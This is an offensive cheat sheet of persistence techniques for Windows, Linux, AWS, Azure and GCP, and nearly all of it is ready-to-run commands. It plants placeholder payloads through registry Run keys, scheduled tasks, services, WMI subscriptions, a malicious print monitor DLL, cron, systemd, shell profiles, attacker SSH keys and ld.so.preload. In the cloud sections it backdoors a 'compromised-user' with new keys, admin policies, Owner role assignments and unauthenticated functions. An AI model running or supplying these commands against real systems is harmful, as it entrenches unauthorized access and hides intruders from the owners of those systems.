#Windows Persistence
Registry Run keys
Common Key locations are
HKCU\Software\Microsoft\Windows\CurrentVersion\Run
HKLM\Software\Microsoft\Windows\CurrentVersion\RunTo persist
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v updater /t REG_SZ /d C:\temp\payload.exeScheduled Tasks
User-level tasks
schtasks /create /sc onlogon /tn updater /tr C:\temp\payload.exeSystem-level tasks
schtasks /create /sc onstart /ru SYSTEM /tn updater /tr C:\temp\payload.exeServices
Create and start the service
sc create updater binPath= "C:\temp\payload.exe" start= auto
sc start updaterStartup Folder
Copy payload into User startup folder:
copy payload.exe "%APPDATA%\Microsoft\Windows\Start Menu\Programs\Startup"WMI Event Subscription
Fileless Technique
$filter = Set-WmiInstance -Namespace root\subscription -Class __EventFilter `
-Arguments @{Name="Updater";EventNamespace="root\cimv2";QueryLanguage="WQL";
Query="SELECT * FROM Win32_LogonSession"}
$consumer = Set-WmiInstance -Namespace root\subscription -Class CommandLineEventConsumer `
-Arguments @{Name="Updater";CommandLineTemplate="powershell -enc <PAYLOAD>"}
Set-WmiInstance -Namespace root\subscription -Class __FilterToConsumerBinding `
-Arguments @{Filter=$filter;Consumer=$consumer}Add Monitor
C2 must be a DLL.
Put the dll in the %systemroot%
Compile and execute monitor.cpp within the environment as well
#include "stdafx.h"
#include "Windows.h"
int main() {
MONITOR_INFO_2 monitorInfo;
TCHAR env[12] = TEXT("Windows x64");
TCHAR name[12] = TEXT("evilMonitor");
TCHAR dll[12] = TEXT("evil64.dll");
monitorInfo.pName = name;
monitorInfo.pEnvironment = env;
monitorInfo.pDLLName = dll;
AddMonitor(NULL, 2, (LPBYTE)&monitorInfo);
return 0;
}Code Credit to ired.team
#Linux Persistence
Cron Jobs
Create a User cron entry to run file every 5 minutes
(crontab -l 2>/dev/null; echo "*/5 * * * * /tmp/payload.sh") | crontab -Create a Root cron entry
echo "* * * * * root /tmp/payload.sh" > /etc/cron.d/updaterchange permissions to run
chmod 644 /etc/cron.d/updaterSystemd Service
Create a Service File (Root)
cat <<EOF > /etc/systemd/system/updater.service
[Unit]
Description=System Updater
[Service]
ExecStart=/tmp/payload
Restart=always
[Install]
WantedBy=multi-user.target
EOFEnable and Start
systemctl daemon-reload
systemctl enable updater
systemctl start updaterCreate a Service File (User)
mkdir -p ~/.config/systemd/user
cat <<EOF > ~/.config/systemd/user/updater.service
[Unit]
Description=User Updater
[Service]
ExecStart=/tmp/payload
Restart=always
[Install]
WantedBy=default.target
EOFEnable and Start
systemctl --user daemon-reload
systemctl --user enable updater
systemctl --user start updaterBash/Shell Profile Startup
Append to .bashrc
echo "/tmp/payload &" >> ~/.bashrcAppend to .bash_profile
echo "/tmp/payload &" >> ~/.bash_profileGlobal
echo "/tmp/payload &" >> /etc/profileSSH Auth Keys
NOT OPSEC SAFE
Add Attacker Key to user
mkdir -p ~/.ssh
echo "ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAACAQ..." >> ~/.ssh/authorized_keys
chmod 600 ~/.ssh/authorized_keys
chmod 700 ~/.sshAdd to auth keys to Root
echo "ssh-rsa AAAA..." >> /root/.ssh/authorized_keysLD_PRELOAD
Force-load a malicious shared object into processes
Create the object
gcc -shared -fPIC evil.c -o /tmp/evil.soecho "/tmp/evil.so" >> /etc/ld.so.preload#AWS Persistence
IAM Access Key
Create a new access key
aws iam create-access-key --user-name compromised-userExfiltrate and Store
IAM Policy
Attach admin policy
aws iam attach-user-policy --user-name compromised-user --policy-arn arn:aws:iam::aws:policy/AdministratorAccessInline policy backdoor
aws iam put-user-policy --user-name compromised-user --policy-name updater --policy-document file://policy.jsonIAM Role Trust Policy
Modify trust relationship
aws iam update-assume-role-policy --role-name AdminRole --policy-document file://trust.jsonLambda
Create Lambda
aws lambda create-function --function-name updater --runtime python3.9 --handler handler.lambda_handler --role arn:aws:iam::<acct>:role/AdminRole --zip-file fileb://payload.zipCloudWatch Event Rules
Create Rule
aws events put-rule --schedule-expression "rate(5 minutes)" --name updaterAttach to target
aws events put-targets --rule updater --targets file://targets.jsonEC2 User Data
Modify User Data
aws ec2 modify-instance-attribute --instance-id i-XXXX --user-data file://userdata.sh#Azure Persistence
Azure AD App Registration
Create an App
az ad app create --display-name updaterAdd Secret
az ad app credential reset --id <APP_ID>Grant Permissions
az ad app permission add --id <APP_ID> --api 00000003-0000-0000-c000-000000000000 --api-permissions <perm>=RoleService Principal Persistence
Create service principal
az ad sp create --id <APP_ID>Assign the role
az role assignment create --assignee <SP_ID> --role Owner --scope /subscriptions/<SUB_ID>Automation Accounts
Create a runbook
az automation runbook create --automation-account-name auto --resource-group rg --name updater --type PowerShellSchedule execution
az automation schedule create --name updater-schedManaged Identiy Abuse
Assign an identity
az vm identity assign --name vm01 --resource-group rgGrant it privileges
az role assignment create --assignee <IDENTITY_ID> --role Contributor --scope /subscriptions/<SUB_ID>#GCP Persistence
Service Account Key Backdoor
Create the key
gcloud iam service-accounts keys create key.json --iam-account svc@project.iam.gserviceaccount.comIAM Role Binding
Grant an account persistent access
gcloud projects add-iam-policy-binding project-id --member serviceAccount:svc@project.iam.gserviceaccount.com --role roles/ownerCloud Functions
Create a new funciton
gcloud functions deploy updater --runtime python39 --trigger-http --allow-unauthenticatedCloud Scheduler
gcloud scheduler jobs create pubsub updater --schedule "*/5 * * * *" --topic updater-topic